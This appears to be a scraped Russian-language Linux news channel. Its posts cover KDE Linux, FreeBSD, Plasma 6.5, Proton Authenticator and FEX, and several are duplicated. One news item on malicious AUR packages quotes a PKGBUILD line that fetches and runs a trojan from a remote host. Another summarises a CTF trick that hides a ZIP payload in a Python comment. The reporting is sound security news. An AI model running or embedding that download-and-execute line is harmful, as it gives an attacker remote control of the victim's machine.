Please open Telegram to view this post
VIEW IN TELEGRAM
💔42😁14😢2❤1
Проект KDE опубликовал дистрибутив KDE Linux Testing Edition
Проект KDE представил KDE Linux Testing Edition — эталонный дистрибутив для демонстрации возможностей рабочего стола KDE. На сайте kde.org появились образы (5.2 ГБ) для Live-загрузки с флешки. Дистрибутив создан разработчиками KDE без посредников для идеальной интеграции технологий проекта.
Сборки основаны на актуальном коде из Git и обновляются ежедневно. Цель — тестирование и контроль качества для разработчиков KDE и энтузиастов. Пока доступна только Wayland-сессия, а поддержка GPU NVIDIA ограничена картами Turing (GTX 16xx) и новее из-за лицензионных ограничений открытых драйверов.
В будущем планируются Enthusiast Edition (свежие бета-версии) и Stable Edition (проверенные релизы). Дистрибутив основан на Arch Linux, но использует атомарные обновления: система монтируется в read-only, а апдейты применяются переключением между двумя разделами с возможностью отката через Btrfs-снапшоты. Для управления — systemd-sysupdate и updatectl.
Приложения устанавливаются отдельно через Flatpak/Snap/AppImage в домашний каталог или в контейнеры (Distrobox/Toolbox). Системные расширения добавляются через systemd-sysext с наложением на /usr.
Linux / Линукс🥸
Проект KDE представил KDE Linux Testing Edition — эталонный дистрибутив для демонстрации возможностей рабочего стола KDE. На сайте kde.org появились образы (5.2 ГБ) для Live-загрузки с флешки. Дистрибутив создан разработчиками KDE без посредников для идеальной интеграции технологий проекта.
Сборки основаны на актуальном коде из Git и обновляются ежедневно. Цель — тестирование и контроль качества для разработчиков KDE и энтузиастов. Пока доступна только Wayland-сессия, а поддержка GPU NVIDIA ограничена картами Turing (GTX 16xx) и новее из-за лицензионных ограничений открытых драйверов.
В будущем планируются Enthusiast Edition (свежие бета-версии) и Stable Edition (проверенные релизы). Дистрибутив основан на Arch Linux, но использует атомарные обновления: система монтируется в read-only, а апдейты применяются переключением между двумя разделами с возможностью отката через Btrfs-снапшоты. Для управления — systemd-sysupdate и updatectl.
Приложения устанавливаются отдельно через Flatpak/Snap/AppImage в домашний каталог или в контейнеры (Distrobox/Toolbox). Системные расширения добавляются через systemd-sysext с наложением на /usr.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🤣7❤3
Forwarded from Типичный Сисадмин
Сейчас, после установки FreeBSD, пользователь оказывается в голой текстовой консоли, и ему предстоит вручную настраивать интернет, ставить драйверы, иксы и само DE. Этот процесс отпугивает даже опытных пользователей, не знакомых со спецификой BSD. В новой версии в текстовом инсталляторе
bsdinstall
появится опция выбора минимальной установки KDE Plasma. Это не новый графический установщик, а просто чекбокс в существующем текстовом интерфейсе, который позволит после перезагрузки получить готовый графический логин, а не мигающий курсор.Хотя выбор KDE в качестве единственного варианта может показаться спорным (многие предпочли бы что-то более легковесное вроде Xfce), но без вариантов - это крутой шаг. FreeBSD наконец-то догоняет своих братанов по BSD-семейству (OpenBSD по умолчанию ставит FVWM, а NetBSD ctwm).
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍27❤15🤯1
Тренажёр по Linux-терминалу —это TUI-приложение содержит более 70 задачек для обучения основам работы в терминале. Учит базовым командам, пайпам, редиректам и прочей терминальной магии. Всё в псевдографике и прямо в консоли.
📌 https://github.com/learnbyexample/TUI-apps/tree/main/CLI-Exercises
Linux / Линукс🥸
📌 https://github.com/learnbyexample/TUI-apps/tree/main/CLI-Exercises
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍26❤1
Онлайн-проект для проверки для каких дистрибутивов и версий доступен тот или иной пакет
📌 https://repology.org
Linux / Линукс🥸
📌 https://repology.org
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
В AUR снова засветились вредоносные пакеты: уже 6 новых случаев
В репозитории AUR для Arch Linux обнаружены сразу шесть новых вредоносных пакетов, внедряющих трояны через PKGBUILD-скрипты. На этот раз под удар попали сборки браузеров и шрифтов, в том числе google-chrome-stable, chrome, chrome-bin, а также ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.
Во всех случаях в скриптах установки фигурировала строка вида: python -c "$(curl https://segs.lol/9wUb1Z)", которая подтягивала вредонос, распознанный как троян Spark. Он позволяет злоумышленнику получить удалённый доступ, управлять процессами, сливать файлы и делать скриншоты. Пакеты были оперативно удалены модераторами, но время их нахождения в AUR составляло от нескольких часов до суток.
Инцидент — продолжение атаки, начавшейся две недели назад, когда похожий код нашли в firefox-patch-bin, librewolf-fix-bin и других. Всё указывает на то, что злоумышленники систематически загружают вредонос под видом популярных пакетов, рассчитывая на доверие пользователей к AUR.
Linux / Линукс🥸
В репозитории AUR для Arch Linux обнаружены сразу шесть новых вредоносных пакетов, внедряющих трояны через PKGBUILD-скрипты. На этот раз под удар попали сборки браузеров и шрифтов, в том числе google-chrome-stable, chrome, chrome-bin, а также ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.
Во всех случаях в скриптах установки фигурировала строка вида: python -c "$(curl https://segs.lol/9wUb1Z)", которая подтягивала вредонос, распознанный как троян Spark. Он позволяет злоумышленнику получить удалённый доступ, управлять процессами, сливать файлы и делать скриншоты. Пакеты были оперативно удалены модераторами, но время их нахождения в AUR составляло от нескольких часов до суток.
Инцидент — продолжение атаки, начавшейся две недели назад, когда похожий код нашли в firefox-patch-bin, librewolf-fix-bin и других. Всё указывает на то, что злоумышленники систематически загружают вредонос под видом популярных пакетов, рассчитывая на доверие пользователей к AUR.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣26🤬9
Forwarded from godnoTECH - Новости IT
Apple сделала неожиданно тёплый жест в сторону Linux-сообщества: теперь на macOS Sequoia можно запускать Kali Linux — тот самый хакерский дистрибутив для пентестеров и специалистов по безопасности. Без виртуалок и двойной загрузки — всё работает через новый контейнерный фреймворк Container, а установка занимает пару команд в терминале.
Технология работает только на Apple Silicon (M1, M2 и дальше), и представляет собой аналог WSL2: внутри macOS запускается изолированная виртуальная среда с Linux. Всё на базе нативной виртуализации Apple, без сторонних гипервизоров. Kali тянется с DockerHub и поднимается как обычный контейнер:
container run --rm -it kalilinux/kali-rolling
.Please open Telegram to view this post
VIEW IN TELEGRAM
❤20😁9👍8
В KDE появилось автоматическое переключение между дневными и ночными темами оформления
Нейт Грэм (Nate Graham), разработчик, занимающийся контролем качества в проекте KDE, опубликовал очередной отчёт о разработке KDE. Среди недавних изменений в кодовой базе, формирующей будущий релиз KDE Plasma 6.5, намеченный на 16 октября:
Linux / Линукс🥸
Нейт Грэм (Nate Graham), разработчик, занимающийся контролем качества в проекте KDE, опубликовал очередной отчёт о разработке KDE. Среди недавних изменений в кодовой базе, формирующей будущий релиз KDE Plasma 6.5, намеченный на 16 октября:
— Добавлена поддержка автоматического переключения в ночное время на отдельно выбранную тёмную тему оформления.
— В конфирутаторе предоставлена возможность выбора глобальных тем оформления, которые будут доступны для переключения на странице быстрого изменения настроек (Quick Settings). На страницу быстрого изменения настроек также добавлена опция для автоматического переключения между дневной и ночной темами.
— Добавлена настройка для показа только светлых или только тёмных вариантов обоев рабочего стола. Также предоставлены опции для включения динамического изменения цвета обоев на основе выбранной цветовой схемы или времени дня, а также закрепления светлого или тёмного вариантов.
— При использовании Wayland обеспечено раскрытие существующих окон при открытии через KRunner файлов в уже запущенных приложениях.
— При использовании Wayland в экранном ридере Orca реализовано распознание состояния режима Caps Lock.
— Настройки обработчиков, вызываемых при переводе указателя к краю экрана (Screen Edges), перенесены в группу настроек дисплея.
— Добавлена поддержка перехода в спящий режим (suspend to disk) с экрана входа в систему на базе SDDM (ранее поддерживался только ждущий режим - suspend to ram).
— В кодовой базе, на основе которой будет сформирован корректирующий выпуск Plasma 6.4.4, устранены ошибки, приводившие к зависанию Plasma при выводе большой порции уведомлений с изображениями, и аварийному завершению при возникновения сбоев во время загрузки плагинов.
— В Qt 6.8.4 устранена ошибка, из-за которой композитный менеджер KWin потреблял слишком много ресурсов CPU в окружении X11 при блокировке или выключении экрана.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍26❤6🔥3
Please open Telegram to view this post
VIEW IN TELEGRAM
💔51❤3
Представлен Proton Authenticator, генератор одноразовых паролей для двухфакторной аутентификации
Швейцарская компания Proton AG представила открытое приложение Proton Authenticator, предназначенное для аутентификации при помощи одноразовых паролей с ограниченным сроком действия, генерируемых при помощи алгоритма TOTP (Time-based One-Time Password). Proton Authenticator может применяться как более функциональная замена проприетарным аутентификаторам, таким как Google Authenticator, Microsoft Authenticator, Authy и Duo, а также в качестве альтернативы открытым проектам FreeOTP и oathtool. Код Proton Authenticator распространяется под лицензией GPLv3. Доступны как мобильные приложения для Android и iOS, так и настольные программы для Linux, macOS и Windows. При разработке в зависимости от платформы применяются языки Kotlin, Swift и Rust.
Алгоритм TOTP позволяет генерировать на локальном устройстве пользователя одноразовые коды подтверждения и проверять их на внешнем сервере, используя в качестве параметров секретный ключ и текущее время. Для генерации пароля обмен данными между клиентом и сервером не требуется (достаточно один раз инициализировать ключ, распознав показанный сервером QR-код или импортировав ключ вручную). Время жизни одноразового пароля обычно ограничивается 30 секундами, после чего требуется генерация нового пароля. Пароль генерируется путём вычисления хэша SHA-1, SHA-256 или SHA-512 над сочетанием из ключа и очередного интервала времени, и использования нескольких младших битов хэша для выделения проверочных цифр.
Linux / Линукс🥸
Швейцарская компания Proton AG представила открытое приложение Proton Authenticator, предназначенное для аутентификации при помощи одноразовых паролей с ограниченным сроком действия, генерируемых при помощи алгоритма TOTP (Time-based One-Time Password). Proton Authenticator может применяться как более функциональная замена проприетарным аутентификаторам, таким как Google Authenticator, Microsoft Authenticator, Authy и Duo, а также в качестве альтернативы открытым проектам FreeOTP и oathtool. Код Proton Authenticator распространяется под лицензией GPLv3. Доступны как мобильные приложения для Android и iOS, так и настольные программы для Linux, macOS и Windows. При разработке в зависимости от платформы применяются языки Kotlin, Swift и Rust.
Алгоритм TOTP позволяет генерировать на локальном устройстве пользователя одноразовые коды подтверждения и проверять их на внешнем сервере, используя в качестве параметров секретный ключ и текущее время. Для генерации пароля обмен данными между клиентом и сервером не требуется (достаточно один раз инициализировать ключ, распознав показанный сервером QR-код или импортировав ключ вручную). Время жизни одноразового пароля обычно ограничивается 30 секундами, после чего требуется генерация нового пароля. Пароль генерируется путём вычисления хэша SHA-1, SHA-256 или SHA-512 над сочетанием из ключа и очередного интервала времени, и использования нескольких младших битов хэша для выделения проверочных цифр.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣47😎9😁4
FEX 2508: эмулятор x86 теперь быстрее на ARM и даже тянет Cyberpunk
Вышел новый релиз FEX 2508 — эмулятора, позволяющего запускать x86 и x86-64 приложения на Linux-системах с ARM64 (AArch64). Его активно использует проект Asahi Linux, чтобы гнать Steam-игры на Apple Silicon. Код на C++ с ассемблером, лицензия MIT.
Вместо chroot используется overlay-прослойка с rootfs в формате SquashFS. Всё нужное подтягивается утилитой FEXRootFSFetcher. Звук, графика и системные вызовы прокидываются через специальные thunk-библиотеки — поддерживаются OpenGL, Vulkan, SDL2, X11, ALSA и пр. Работает даже bidirectional — часть API можно пробрасывать и обратно.
Что нового:
— FPS в Cyberpunk 2077 вырос на 38.9%, в Doom 2016 — на 30.9%, Stray — на 25%, Grim Fandango Remastered — почти на 25%, Teardown — на 12.6%.
— Улучшили JIT-компиляцию, оптимизировали call-return и память под TSO (Total Store Ordering), что особенно актуально для Apple M1/M2.
— Добавили поддержку NX-бита, теперь исполняемый код не полетит из любой дырки в памяти.
— Повысилась устойчивость к антиотладке в старых играх вроде Crysis 2 и Peggle Deluxe.
Linux / Линукс🥸
Вышел новый релиз FEX 2508 — эмулятора, позволяющего запускать x86 и x86-64 приложения на Linux-системах с ARM64 (AArch64). Его активно использует проект Asahi Linux, чтобы гнать Steam-игры на Apple Silicon. Код на C++ с ассемблером, лицензия MIT.
Вместо chroot используется overlay-прослойка с rootfs в формате SquashFS. Всё нужное подтягивается утилитой FEXRootFSFetcher. Звук, графика и системные вызовы прокидываются через специальные thunk-библиотеки — поддерживаются OpenGL, Vulkan, SDL2, X11, ALSA и пр. Работает даже bidirectional — часть API можно пробрасывать и обратно.
Что нового:
— FPS в Cyberpunk 2077 вырос на 38.9%, в Doom 2016 — на 30.9%, Stray — на 25%, Grim Fandango Remastered — почти на 25%, Teardown — на 12.6%.
— Улучшили JIT-компиляцию, оптимизировали call-return и память под TSO (Total Store Ordering), что особенно актуально для Apple M1/M2.
— Добавили поддержку NX-бита, теперь исполняемый код не полетит из любой дырки в памяти.
— Повысилась устойчивость к антиотладке в старых играх вроде Crysis 2 и Peggle Deluxe.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24❤6
Please open Telegram to view this post
VIEW IN TELEGRAM
😁36👍12❤1
Python-скрипт запускал комментарии, но не так, как ожидалось
На CTF-соревновании UIUCTF 2025 участнику удалось выполнить произвольный код на сервере, несмотря на то, что он мог менять только содержимое комментария в Python-скрипте. Казалось бы, надёжно: никакого eval, спецсимволы \n и \r вырезаются, данные помещаются в # комментарий, а затем скрипт запускается как .py. Но не всё так просто.
Уязвимость не в синтаксисе Python, а в его механике запуска файлов. Python с версии 2.6 умеет выполнять ZIP-архивы, если в них есть __main__.py. Причём архив может иметь расширение .py — Python определяет ZIP не по имени файла, а по структуре. Индексация архива идёт не с начала, а с конца — по секции EOCD, в которой можно хранить произвольный комментарий.
Именно это и использовал участник: подставил структурированный zip-архив прямо в текст комментария, где в конце файла лежал __main__.py со зловредом. Даже строка print("Thanks for playing!") после комментария не мешала — её Python игнорирует, считая частью ZIP-комментария.
Этот баг не связан с недавно закрытой уязвимостью с \0, но эксплуатирует аналогичную идею: исполнение "данных", маскирующихся под код.
Linux / Линукс🥸
На CTF-соревновании UIUCTF 2025 участнику удалось выполнить произвольный код на сервере, несмотря на то, что он мог менять только содержимое комментария в Python-скрипте. Казалось бы, надёжно: никакого eval, спецсимволы \n и \r вырезаются, данные помещаются в # комментарий, а затем скрипт запускается как .py. Но не всё так просто.
Уязвимость не в синтаксисе Python, а в его механике запуска файлов. Python с версии 2.6 умеет выполнять ZIP-архивы, если в них есть __main__.py. Причём архив может иметь расширение .py — Python определяет ZIP не по имени файла, а по структуре. Индексация архива идёт не с начала, а с конца — по секции EOCD, в которой можно хранить произвольный комментарий.
Именно это и использовал участник: подставил структурированный zip-архив прямо в текст комментария, где в конце файла лежал __main__.py со зловредом. Даже строка print("Thanks for playing!") после комментария не мешала — её Python игнорирует, считая частью ZIP-комментария.
Этот баг не связан с недавно закрытой уязвимостью с \0, но эксплуатирует аналогичную идею: исполнение "данных", маскирующихся под код.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18🤔1🌚1
Linux / Линукс
В AUR снова засветились вредоносные пакеты: уже 6 новых случаев В репозитории AUR для Arch Linux обнаружены сразу шесть новых вредоносных пакетов, внедряющих трояны через PKGBUILD-скрипты. На этот раз под удар попали сборки браузеров и шрифтов, в том числе…
Please open Telegram to view this post
VIEW IN TELEGRAM
👍30😁15😢7
Чат в терминале Linux: почти «Матрица» в реальной жизни
В статье рассказывается о том, как создать защищённое текстовое общение в духе «Матрицы» — без серверов и доверия, используя инструменты типа Cryptcat.
📌 https://habr.com/ru/companies/ru_mts/articles/900928/
Linux / Линукс🥸
В статье рассказывается о том, как создать защищённое текстовое общение в духе «Матрицы» — без серверов и доверия, используя инструменты типа Cryptcat.
📌 https://habr.com/ru/companies/ru_mts/articles/900928/
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤1